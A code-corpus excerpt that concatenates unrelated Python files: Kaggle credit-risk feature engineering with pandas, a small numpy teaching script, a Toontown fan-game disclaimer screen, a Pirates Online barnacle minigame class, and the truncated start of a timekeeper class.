def ApplicationBuroBalance(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
buro = pd.read_csv('../input/bureau.csv')
buro_balance = pd.read_csv('../input/bureau_balance.csv')
# Handle Buro Balance
buro_balance.loc[buro_balance['STATUS']=='C', 'STATUS'] = '0'
buro_balance.loc[buro_balance['STATUS']=='X', 'STATUS'] = '0'
buro_balance['STATUS'] = buro_balance['STATUS'].astype('int64')
buro_balance_group = buro_balance.groupby('SK_ID_BUREAU').agg({'STATUS':['max','mean'], 'MONTHS_BALANCE':'max'})
buro_balance_group.columns = [' '.join(col).strip() for col in buro_balance_group.columns.values]
idx = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].transform(max) == buro_balance['MONTHS_BALANCE']
Buro_Balance_Last = buro_balance[idx][['SK_ID_BUREAU','STATUS']]
Buro_Balance_Last.rename(columns={'STATUS': 'Buro_Balance_Last_Value'}, inplace=True)
Buro_Balance_Last['Buro_Balance_Max'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['STATUS max'])
Buro_Balance_Last['Buro_Balance_Mean'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['STATUS mean'])
Buro_Balance_Last['Buro_Balance_Last_Month'] = Buro_Balance_Last['SK_ID_BUREAU'].map(buro_balance_group['MONTHS_BALANCE max'])
# Handle Buro Data
def nonUnique(x):
return x.nunique()
def modeValue(x):
return stats.mode(x)[0][0]
def totalBadCredit(x):
badCredit = 0
for value in x:
if(value==2 or value==3):
badCredit+=1
return badCredit
def creditOverdue(x):
overdue=0
for value in x:
if(value>0):
overdue+=1
return overdue
categorical_feats = [f for f in buro.columns if buro[f].dtype == 'object']
for f_ in categorical_feats:
buro[f_], indexer = pd.factorize(buro[f_])
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
# Aggregate Values on All Credits
buro_group = buro.groupby('SK_ID_CURR').agg({'SK_ID_BUREAU':'count',
'AMT_CREDIT_SUM':'sum',
'AMT_CREDIT_SUM_DEBT':'sum',
'CREDIT_CURRENCY': [nonUnique, modeValue],
'CREDIT_TYPE': [nonUnique, modeValue],
'CNT_CREDIT_PROLONG': 'sum',
'CREDIT_ACTIVE': totalBadCredit,
'CREDIT_DAY_OVERDUE': creditOverdue
})
buro_group.columns = [' '.join(col).strip() for col in buro_group.columns.values]
# Aggregate Values on Active Credits
buro_active = buro.loc[buro['CREDIT_ACTIVE']==1]
buro_group_active = buro_active.groupby('SK_ID_CURR').agg({'AMT_CREDIT_SUM': ['sum', 'count'],
'AMT_CREDIT_SUM_DEBT': 'sum',
'AMT_CREDIT_SUM_LIMIT': 'sum'
})
buro_group_active.columns = [' '.join(col).strip() for col in buro_group_active.columns.values]
# Getting last credit for each user
idx = buro.groupby('SK_ID_CURR')['SK_ID_BUREAU'].transform(max) == buro['SK_ID_BUREAU']
Buro_Last = buro[idx][['SK_ID_CURR','CREDIT_TYPE','DAYS_CREDIT_UPDATE','DAYS_CREDIT',
'DAYS_CREDIT_ENDDATE','DAYS_ENDDATE_FACT', 'SK_ID_BUREAU']]
Buro_Last['Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group['SK_ID_BUREAU count'])
Buro_Last['Total_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM sum'])
Buro_Last['Total_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['NumberOfCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY nonUnique'])
Buro_Last['MostCommonCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY modeValue'])
Buro_Last['NumberOfCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE nonUnique'])
Buro_Last['MostCommonCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE modeValue'])
Buro_Last['NumberOfCreditProlong'] = Buro_Last['SK_ID_CURR'].map(buro_group['CNT_CREDIT_PROLONG sum'])
Buro_Last['NumberOfBadCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_ACTIVE totalBadCredit'])
Buro_Last['NumberOfDelayedCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_DAY_OVERDUE creditOverdue'])
Buro_Last['Active_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM sum'])
Buro_Last['Active_Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM count'])
Buro_Last['Active_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['Active_Credit_Card_Limit'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_LIMIT sum'])
Buro_Last['BalanceOnCreditBuro'] = Buro_Last['Active_Debt_Amount'] / Buro_Last['Active_Credit_Amount']
# Merge buro with Buro Balance
buro_merged = pd.merge(buro, Buro_Balance_Last, how='left', on='SK_ID_BUREAU')
buro_merged = buro_merged[['SK_ID_CURR','SK_ID_BUREAU','Buro_Balance_Last_Value','Buro_Balance_Max',
'Buro_Balance_Mean','Buro_Balance_Last_Month']]
buro_merged_group = buro_merged.groupby('SK_ID_CURR').agg(np.mean)
buro_merged_group.reset_index(inplace=True)
buro_merged_group.drop('SK_ID_BUREAU', axis=1, inplace=True)
# Add Tables to main Data
data = data.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=buro_merged_group.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=buro_merged_group.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationBuro(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
buro = pd.read_csv('../input/bureau.csv')
def nonUnique(x):
return x.nunique()
def modeValue(x):
return stats.mode(x)[0][0]
def totalBadCredit(x):
badCredit = 0
for value in x:
if(value==2 or value==3):
badCredit+=1
return badCredit
def creditOverdue(x):
overdue=0
for value in x:
if(value>0):
overdue+=1
return overdue
categorical_feats = [f for f in buro.columns if buro[f].dtype == 'object']
for f_ in categorical_feats:
buro[f_], indexer = pd.factorize(buro[f_])
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
# Aggregate Values on All Credits
buro_group = buro.groupby('SK_ID_CURR').agg({'SK_ID_BUREAU':'count',
'AMT_CREDIT_SUM':'sum',
'AMT_CREDIT_SUM_DEBT':'sum',
'CREDIT_CURRENCY': [nonUnique, modeValue],
'CREDIT_TYPE': [nonUnique, modeValue],
'CNT_CREDIT_PROLONG': 'sum',
'CREDIT_ACTIVE': totalBadCredit,
'CREDIT_DAY_OVERDUE': creditOverdue
})
buro_group.columns = [' '.join(col).strip() for col in buro_group.columns.values]
# Aggregate Values on Active Credits
buro_active = buro.loc[buro['CREDIT_ACTIVE']==1]
buro_group_active = buro_active.groupby('SK_ID_CURR').agg({'AMT_CREDIT_SUM': ['sum', 'count'],
'AMT_CREDIT_SUM_DEBT': 'sum',
'AMT_CREDIT_SUM_LIMIT': 'sum'
})
buro_group_active.columns = [' '.join(col).strip() for col in buro_group_active.columns.values]
# Getting last credit for each user
idx = buro.groupby('SK_ID_CURR')['SK_ID_BUREAU'].transform(max) == buro['SK_ID_BUREAU']
Buro_Last = buro[idx][['SK_ID_CURR','CREDIT_TYPE','DAYS_CREDIT_UPDATE','DAYS_CREDIT',
'DAYS_CREDIT_ENDDATE','DAYS_ENDDATE_FACT']]
Buro_Last['Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group['SK_ID_BUREAU count'])
Buro_Last['Total_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM sum'])
Buro_Last['Total_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['NumberOfCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY nonUnique'])
Buro_Last['MostCommonCreditCurrency'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_CURRENCY modeValue'])
Buro_Last['NumberOfCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE nonUnique'])
Buro_Last['MostCommonCreditType'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_TYPE modeValue'])
Buro_Last['NumberOfCreditProlong'] = Buro_Last['SK_ID_CURR'].map(buro_group['CNT_CREDIT_PROLONG sum'])
Buro_Last['NumberOfBadCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_ACTIVE totalBadCredit'])
Buro_Last['NumberOfDelayedCredit'] = Buro_Last['SK_ID_CURR'].map(buro_group['CREDIT_DAY_OVERDUE creditOverdue'])
Buro_Last['Active_Credit_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM sum'])
Buro_Last['Active_Credit_Count'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM count'])
Buro_Last['Active_Debt_Amount'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_DEBT sum'])
Buro_Last['Active_Credit_Card_Limit'] = Buro_Last['SK_ID_CURR'].map(buro_group_active['AMT_CREDIT_SUM_LIMIT sum'])
Buro_Last['BalanceOnCreditBuro'] = Buro_Last['Active_Debt_Amount'] / Buro_Last['Active_Credit_Amount']
data = data.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=Buro_Last.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationOnly(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def ApplicationBuroAndPrev(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
prev = pd.read_csv('../input/previous_application.csv')
buro = pd.read_csv('../input/bureau.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
prev_cat_features = [f_ for f_ in prev.columns if prev[f_].dtype == 'object']
for f_ in prev_cat_features:
prev = pd.concat([prev, pd.get_dummies(prev[f_], prefix=f_)], axis=1)
cnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()
prev['SK_ID_PREV'] = prev['SK_ID_CURR'].map(cnt_prev['SK_ID_PREV'])
avg_prev = prev.groupby('SK_ID_CURR').mean()
avg_prev.columns = ['prev_app_' + f_ for f_ in avg_prev.columns]
buro_cat_features = [f_ for f_ in buro.columns if buro[f_].dtype == 'object']
for f_ in buro_cat_features:
buro = pd.concat([buro, pd.get_dummies(buro[f_], prefix=f_)], axis=1)
avg_buro = buro.groupby('SK_ID_CURR').mean()
avg_buro['buro_count'] = buro[['SK_ID_BUREAU','SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']
avg_buro.columns = ['bureau_' + f_ for f_ in avg_buro.columns]
data = data.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
y = data['TARGET']
data.drop(['SK_ID_CURR','TARGET'], axis=1, inplace=True)
test.drop(['SK_ID_CURR'], axis=1, inplace=True)
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def AllData(reduce_mem=True):
data = pd.read_csv('../input/application_train.csv')
test = pd.read_csv('../input/application_test.csv')
prev = pd.read_csv('../input/previous_application.csv')
buro = pd.read_csv('../input/bureau.csv')
buro_balance = pd.read_csv('../input/bureau_balance.csv')
credit_card = pd.read_csv('../input/credit_card_balance.csv')
POS_CASH = pd.read_csv('../input/POS_CASH_balance.csv')
payments = pd.read_csv('../input/installments_payments.csv')
categorical_feats = [f for f in data.columns if data[f].dtype == 'object']
for f_ in categorical_feats:
data[f_], indexer = pd.factorize(data[f_])
test[f_] = indexer.get_indexer(test[f_])
y = data['TARGET']
del data['TARGET']
#Pre-processing buro_balance
print('Pre-processing buro_balance...')
buro_grouped_size = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].size()
buro_grouped_max = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].max()
buro_grouped_min = buro_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].min()
buro_counts = buro_balance.groupby('SK_ID_BUREAU')['STATUS'].value_counts(normalize = False)
buro_counts_unstacked = buro_counts.unstack('STATUS')
buro_counts_unstacked.columns = ['STATUS_0', 'STATUS_1','STATUS_2','STATUS_3','STATUS_4','STATUS_5','STATUS_C','STATUS_X',]
buro_counts_unstacked['MONTHS_COUNT'] = buro_grouped_size
buro_counts_unstacked['MONTHS_MIN'] = buro_grouped_min
buro_counts_unstacked['MONTHS_MAX'] = buro_grouped_max
buro = buro.join(buro_counts_unstacked, how='left', on='SK_ID_BUREAU')
#Pre-processing previous_application
print('Pre-processing previous_application...')
#One-hot encoding of categorical features in previous application data set
prev_cat_features = [pcol for pcol in prev.columns if prev[pcol].dtype == 'object']
prev = pd.get_dummies(prev, columns=prev_cat_features)
avg_prev = prev.groupby('SK_ID_CURR').mean()
cnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()
avg_prev['nb_app'] = cnt_prev['SK_ID_PREV']
del avg_prev['SK_ID_PREV']
#Pre-processing buro
print('Pre-processing buro...')
#One-hot encoding of categorical features in buro data set
buro_cat_features = [bcol for bcol in buro.columns if buro[bcol].dtype == 'object']
buro = pd.get_dummies(buro, columns=buro_cat_features)
avg_buro = buro.groupby('SK_ID_CURR').mean()
avg_buro['buro_count'] = buro[['SK_ID_BUREAU', 'SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']
del avg_buro['SK_ID_BUREAU']
#Pre-processing POS_CASH
print('Pre-processing POS_CASH...')
le = LabelEncoder()
POS_CASH['NAME_CONTRACT_STATUS'] = le.fit_transform(POS_CASH['NAME_CONTRACT_STATUS'].astype(str))
nunique_status = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()
nunique_status2 = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()
POS_CASH['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']
POS_CASH['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']
POS_CASH.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)
#Pre-processing credit_card
print('Pre-processing credit_card...')
credit_card['NAME_CONTRACT_STATUS'] = le.fit_transform(credit_card['NAME_CONTRACT_STATUS'].astype(str))
nunique_status = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()
nunique_status2 = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()
credit_card['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']
credit_card['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']
credit_card.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)
#Pre-processing payments
print('Pre-processing payments...')
avg_payments = payments.groupby('SK_ID_CURR').mean()
avg_payments2 = payments.groupby('SK_ID_CURR').max()
avg_payments3 = payments.groupby('SK_ID_CURR').min()
del avg_payments['SK_ID_PREV']
#Join data bases
print('Joining databases...')
data = data.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_buro.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')
data = data.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')
test = test.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')
if(reduce_mem==True):
data = reduce_mem_usage(data)
test = reduce_mem_usage(test)
return(data, test, y)
def reduce_mem_usage(df):
start_mem = df.memory_usage().sum() / 1024**2
print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))
for col in df.columns:
col_type = df[col].dtype
if col_type != object:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
else:
df[col] = df[col].astype('category')
end_mem = df.memory_usage().sum() / 1024**2
print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))
print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))
return df
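
# Example: downcast one of the competition tables before modelling; on these
# datasets this typically cuts memory use by half or more:
#
#     data = pd.read_csv('../input/application_train.csv')
#     data = reduce_mem_usage(data)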
def AllData_v5(reduce_mem=True):
df = GatherTables.application_train_test()
with GatherTables.timer("Process bureau and bureau_balance"):
bureau = GatherTables.bureau_and_balance()
print("Bureau df shape:", bureau.shape)
df = df.join(bureau, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del bureau
gc.collect()
with GatherTables.timer("Process previous_applications"):
prev = GatherTables.previous_applications()
print("Previous applications df shape:", prev.shape)
df = df.join(prev, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del prev
gc.collect()
with GatherTables.timer("Process POS-CASH balance"):
pos = GatherTables.pos_cash()
print("Pos-cash balance df shape:", pos.shape)
df = df.join(pos, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del pos
gc.collect()
with GatherTables.timer("Process installments payments"):
ins = GatherTables.installments_payments()
print("Installments payments df shape:", ins.shape)
df = df.join(ins, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del ins
gc.collect()
with GatherTables.timer("Process credit card balance"):
cc = GatherTables.credit_card_balance()
print("Credit card balance df shape:", cc.shape)
df = df.join(cc, how='left', on='SK_ID_CURR')
print("Current data shape:", df.shape)
del cc
gc.collect()
df, new_columns = one_hot_encoder(df)
df.drop('SK_ID_CURR', axis=1, inplace=True)
data = df[df['TARGET'].notnull()]
test = df[df['TARGET'].isnull()]
y = data.pop('TARGET')
test.drop(['TARGET'], axis=1, inplace=True)
return(data, test, y) | 1.882813 | 2 |
examples/python/numpy_functions.py | benedicteb/FYS2140-Resources | 0 | 33668 | <filename>examples/python/numpy_functions.py
#!/usr/bin/env python
"""
Created on Mon 2 Dec 2013
Script viser import av funksjoner fra numpy og bruk av noen.
@author <NAME>
"""
from numpy import *
print 'e^1 =', exp( 1 ) # Eksponentialfunksjonen
print 'cos(pi) =', cos( pi ) # Cosinus
print 'sqrt(4) =', sqrt( 4 ) # Kvadratrot
print 'range(5) =', range(5) # Rekke opp til 4
print 'zeros(5) =', zeros(5) # Tom array med 5 elementer
print 'linspace(0,5,5) =', linspace(0,5,5) # Rekke som ikke oeker med 1
"""
bruker @ unix $ python numpy_functions.py
e^1 = 2.71828182846
cos(pi) = -1.0
sqrt(4) = 2.0
range(5) = [0, 1, 2, 3, 4]
zeros(5) = [ 0. 0. 0. 0. 0.]
linspace(0,5,5) = [ 0. 1.25 2.5 3.75 5. ]
"""
| 2.1875 | 2 |
toontown/dmenu/DMenuDisclaimer.py | LittleNed/toontown-stride | 1 | 33796 | from direct.gui.DirectGui import OnscreenText, DirectButton
from panda3d.core import *
from direct.interval.IntervalGlobal import *
from direct.showbase.DirectObject import DirectObject
from toontown.toonbase import ToontownGlobals
class DMenuDisclaimer(DirectObject):
notify = directNotify.newCategory('DisclaimerScreen')
def __init__(self):
DirectObject.__init__(self)
base.setBackgroundColor(0, 0, 0)
disclaimerText = "Project Altis is a not-for-profit fanmade parody made under Fair Use. Project Altis is not affiliated with The Walt Disney Company and/or the Disney Interactive Media Group (collectively referred to as \"Disney\") by clicking I agree you hereby agree that you acknowledge this fact."
self.disclaimer = OnscreenText(text = disclaimerText, font = ToontownGlobals.getMinnieFont(), style = 3, wordwrap = 30, scale = .08, pos = (0, .3, 0))
gui = loader.loadModel('phase_3/models/gui/tt_m_gui_mat_mainGui.bam')
yesUp = gui.find('**/tt_t_gui_mat_okUp')
yesDown = gui.find('**/tt_t_gui_mat_okDown')
noUp = gui.find('**/tt_t_gui_mat_closeUp')
noDown = gui.find('**/tt_t_gui_mat_closeDown')
        # Store the buttons under distinct names so they do not shadow the
        # handler methods or DirectObject.accept(), which Panda3D uses for
        # event handling.
        self.acceptButton = DirectButton(parent = aspect2d, relief = None, image = (yesUp, yesDown, yesUp), image_scale = (0.6, 0.6, 0.6), image1_scale = (0.7, 0.7, 0.7), image2_scale = (0.7, 0.7, 0.7), text = ('', 'I Agree', 'I Agree'), text_pos=(0, -0.175), text_style = 3, text_scale=0.08, pos = (.4, 0, -.5), command = self.handleAccept)
        self.denyButton = DirectButton(parent = aspect2d, relief = None, image = (noUp, noDown, noUp), image_scale = (0.6, 0.6, 0.6), image1_scale = (0.7, 0.7, 0.7), image2_scale = (0.7, 0.7, 0.7), text = ('', 'I Disagree', 'I Disagree'), text_pos=(0, -0.175), text_style = 3, text_scale=0.08, pos = (-.4, 0, -.5), command = self.handleDeny)

    def handleAccept(self):
        self.disclaimer['text'] = 'Loading...'
        self.acceptButton.destroy()
        self.denyButton.destroy()
        base.graphicsEngine.renderFrame()
        messenger.send("AgreeToGame")
        base.cr.hasAccepted = True
        self.disclaimer.removeNode()

    def handleDeny(self):
        base.exitFunc() | 1.320313 | 1 |
pirates/minigame/RepairBarnacle.py | Willy5s/Pirates-Online-Rewritten | 81 | 33924 | <gh_stars>10-100
import random
from pandac.PandaModules import Point3
from direct.gui.DirectGui import DirectFrame, DirectLabel
from direct.fsm import FSM
from direct.interval.IntervalGlobal import *
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
import RepairGlobals
MIN_SCALE = 1.5
MAX_SCALE_ADD = 1.0
MAX_SCRUB_AMT = 20.0
class RepairBarnacle(DirectFrame, FSM.FSM):
barnacleFallSounds = None
def __init__(self, name, barnacleGeom):
self.config = RepairGlobals.Careening
DirectFrame.__init__(self, parent=None, relief=None)
self.barnacleGeom = barnacleGeom
FSM.FSM.__init__(self, 'Barnacle_%sFSM' % name)
self._initAudio()
self._initVars()
self._initGUI()
return
def _initVars(self):
self.heat = 0.0
self.hp = 100
self.maxHP = 100
self.currentShake = None
self.fallingAnim = None
return
def _initAudio(self):
if not self.barnacleFallSounds:
RepairBarnacle.barnacleFallSounds = (
loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE1), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE2), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE3), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE4), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE5))
def _initGUI(self):
self.barnacleGeom.reparentTo(self)
self.barnacleGeom.setScale(0.6)
self.barnacleGeom.setR(random.random() * 360)
if self.config.showBarnacleHP:
self.hpLabel = DirectLabel(text='', scale=(0.025, 0.025, 0.025), pos=(0.0, 0.0, -0.01), textMayChange=1, parent=self)
def destroy(self):
if self.currentShake is not None:
self.currentShake.clearToInitial()
self.currentShake = None
del self.currentShake
if self.fallingAnim is not None:
self.fallingAnim.clearToInitial()
self.fallingAnim = None
del self.fallingAnim
self.cleanup()
if self.config.showBarnacleHP:
self.hpLabel.destroy()
del self.hpLabel
DirectFrame.destroy(self)
self.barnacleGeom.removeNode()
del self.barnacleGeom
return
def setMaxHP(self, newMaxHP, globalMaxHP):
self.maxHP = newMaxHP
self.globalMaxHP = globalMaxHP
def setHP(self, newHP):
self.hp = newHP
if self.config.showBarnacleHP:
self.hpLabel['text'] = '%i' % self.hp
self.hpLabel.setText()
if self.hp <= 0.0:
self.hp = 0.0
self.request('Falling')
self.setScale(self.hp * MAX_SCALE_ADD / self.globalMaxHP + MIN_SCALE)
def reduceHP(self, pushDir, powerScale):
amount = pushDir.length()
pushDir.normalize()
self.heat = min(1.0, self.heat + amount)
amount *= 50
if amount > MAX_SCRUB_AMT:
amount = MAX_SCRUB_AMT
amount *= powerScale
newHP = self.hp - amount
self.setHP(newHP)
if self.currentShake is None:
            self.currentShake = Sequence(
                LerpPosInterval(self, duration=0.03,
                                pos=(self.getX() - pushDir[0] * (0.01 + amount / 1000.0),
                                     self.getY(),
                                     self.getZ() - pushDir[1] * (0.01 + amount / 1000.0)),
                                blendType='easeIn'),
                LerpPosInterval(self, duration=0.06,
                                pos=(self.getX(), self.getY(), self.getZ()),
                                blendType='easeOut'),
                LerpPosInterval(self, duration=0.04,
                                pos=(self.getX() + pushDir[0] * (0.0075 + amount / 2000.0),
                                     self.getY(),
                                     self.getZ() + pushDir[1] * (0.005 + amount / 2000.0)),
                                blendType='easeIn'),
                LerpPosInterval(self, duration=0.08,
                                pos=(self.getX(), self.getY(), self.getZ()),
                                blendType='easeOut'),
                Func(self.clearCurrentShake))
self.currentShake.start()
return
def checkCollision(self, mousePosition):
sld = Point3(mousePosition.getX(), 0.0, mousePosition.getY()) - self.getPos(render2d)
return self.getCurrentOrNextState() == 'Idle' and sld.length() < self.config.barnacleRadius * self.getScale().getX()
def clearCurrentShake(self):
self.currentShake = None
return
def enterIdle(self):
        # Show one randomly chosen barnacle variant and hide the rest
        # (random.uniform returned a float and visibleIndex was never used).
        visibleIndex = random.randrange(self.barnacleGeom.getNumChildren())
        for i in range(self.barnacleGeom.getNumChildren()):
            if i == visibleIndex:
                self.barnacleGeom.getChild(i).unstash()
            else:
                self.barnacleGeom.getChild(i).stash()
newHP = self.maxHP
self.heat = 0.0
self.setHP(newHP)
self.unstash()
def exitIdle(self):
pass
def enterFalling(self):
if self.currentShake is not None:
self.currentShake.finish()
sound = random.choice(self.barnacleFallSounds)
sound.play()
self.fallingAnim = Sequence(LerpPosInterval(self, duration=2.0, pos=(self.getX(), self.getY(), self.getZ() - 2.0), blendType='easeIn'), Func(self.request, 'Clean'))
self.fallingAnim.start()
return
def exitFalling(self):
self.stash()
def enterClean(self):
pass
def exitClean(self):
pass | 1.664063 | 2 |
Onaeri/timekeeper.py | Lakitna/Onaeri | 0 | 34052 | <reponame>Lakitna/Onaeri<gh_stars>0
import time
import math
from . import settings
class TimeKeeper:
"""
Handles timekeeping in timecodes
"""
def __init__(self, minpertimecode=None,
runtime=0, update=True, latestcode=None):
self._minPerTimeCode = minpertimecode or settings.Global.minPerTimeCode
self.latestCode = latestcode or self.code()
self.update = update
self.runtime = runtime
def tick(self):
"""
Progress the timekeeper and set update flag on timeCode change.
"""
if self.latestCode == self.code():
self.update = False
else:
self.update = True
